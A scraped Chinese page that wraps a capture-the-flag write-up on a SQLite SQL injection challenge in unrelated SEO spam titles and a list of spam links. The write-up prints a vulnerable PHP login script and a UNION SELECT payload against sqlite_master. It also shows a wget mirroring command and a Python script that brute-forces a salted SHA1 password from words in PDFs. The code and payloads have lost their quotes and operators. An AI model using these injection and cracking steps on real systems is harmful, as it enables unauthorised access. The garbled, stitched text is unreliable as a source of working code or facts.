当前位置: 首页 > news >正文

3深圳网站建设设计网页英语

3深圳网站建设,设计网页英语,邯郸最新消息,橙云 php网站建设该题考察SQL注入 正文 后台扫到robots.txt 页面内容如下#xff1a; 进入login.php 页面源代码如图#xff1a; 传参debug得到php代码#xff1a; ?php if(isset($_POST[usr]) isset($_POST[pw])){$user $_POST[usr];$pass $_POST[pw];$db new SQLite3… 该题考察SQL注入 正文 后台扫到robots.txt 页面内容如下 进入login.php 页面源代码如图 传参debug得到php代码 ?php if(isset($_POST[usr]) isset($_POST[pw])){$user $_POST[usr];$pass $_POST[pw];$db new SQLite3(../fancy.db);$res $db-query(SELECT id,name from Users where name.$user. and password.sha1($pass.Salz!).);if($res){$row $res-fetchArray();}else{echo brSome Error occourred!;}if(isset($row[id])){setcookie(name, .$row[name], time() 60, /);header(Location: /);die();}}if(isset($_GET[debug])) highlight_file(login.php); ? pass变量拼接Salz并且经过sha1加密后与password进行比较 所以思路是SQL注入把pass找出来注意这里的数据库是SQLite数据库 先判断注入点个数 所以注入点个数为2 接着查表名 union select 1,name from sqlite_master where typetable--接着查SQL查询语句 CREATETABLEUsers%28idintprimarykey%2Cnamevarchar%28255%29%2Cpasswordvarchar%28255%29%2Chintvarchar%28255%29%29 格式化 接着利用 limit 进行移位查询 结果如下 推测favword在之前的英文页面中于是使用kali把页面都下载下来 wget ip -r -np -nd -A .pdf接着写脚本将每个词都与Salz拼接进行加密看是否匹配3fab54a50e770d830c0416df817567662a9dc85c from cStringIO import StringIO from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter from pdfminer.converter import TextConverter from pdfminer.layout import LAParams from pdfminer.pdfpage import PDFPage import sys import string import os import hashlibdef get_pdf():return [i for i in os.listdir(./) if i.endswith(pdf)]def convert_pdf_2_text(path):rsrcmgr PDFResourceManager()retstr StringIO()device TextConverter(rsrcmgr, retstr, codecutf-8, laparamsLAParams())interpreter PDFPageInterpreter(rsrcmgr, device)with open(path, rb) as fp:for page in PDFPage.get_pages(fp, set()):interpreter.process_page(page)text retstr.getvalue()device.close()retstr.close()return textdef find_password():pdf_path get_pdf()for i in pdf_path:print Searching word in ipdf_text convert_pdf_2_text(i).split( )for word in pdf_text:sha1_password hashlib.sha1(wordSalz!).hexdigest()if sha1_password 3fab54a50e770d830c0416df817567662a9dc85c:print Find the password : wordexit()if __name__ __main__:find_password()得到favword为ThinJerboa即pass为ThinJerboa 在admin.php传参即可 得到flag
http://www.pierceye.com/news/771834/

相关文章:

  • 四川建设网电子招投标网站莱芜金点子电话
  • 深圳科技网站建设网站怎么做跳站
  • 做网站需要多少人全国物流货运平台
  • 温州建网站用自己的电脑做网站
  • 综合性门户网站有哪些高端网站建设 房产
  • 百度做的网站能优化吗如何在jsp上做网站页面代码
  • 广州市品牌网站建设公司营销型网站开发推广
  • 甜品网站首页设计用php做的网站模版
  • 怎样做企业的网站百度下载安装免费版
  • 常州市网站优化汕头网站建设和运营
  • wordpress 同分类评论调用seo排名是什么
  • 网站建设推广怎么玩软件开发模型是什么
  • 网站开发报价表格海口注册公司代理公司地址电话
  • 西宁好的网站建设视频网站文案
  • 郑州网站优化网络建设有限公司网站建设 交单流程
  • 网站搬家内页打不开重庆市建设工程信息网怎么进不去
  • 深圳 做公司网站网站用什么建设
  • 网站更换空间对优化的影响营销号视频生成器手机版
  • 南宁大型网站推广公司昆山网站制作哪家好
  • 格尔木哪里有做网站的wordpress编辑器排版
  • 怎样开电商襄阳抖音seo找哪家
  • 个人网站 域名舞阳专业做网站
  • 做国外购物网站凤山网站seo
  • 苏州制作网站的有几家WordPress文章编辑链接
  • 免费看电视剧的网站2021网站建设坂田
  • 网站建设中 目录怎么做更好wordpress最好用的虚拟主机
  • 网站百度网盘南京市建设局网站
  • 让别人做网站多久开始注册域名公司注册地址提供
  • 手机网站 设计趋势建设银行暑期招聘网站
  • 兰山做网站专业深圳网站定制开发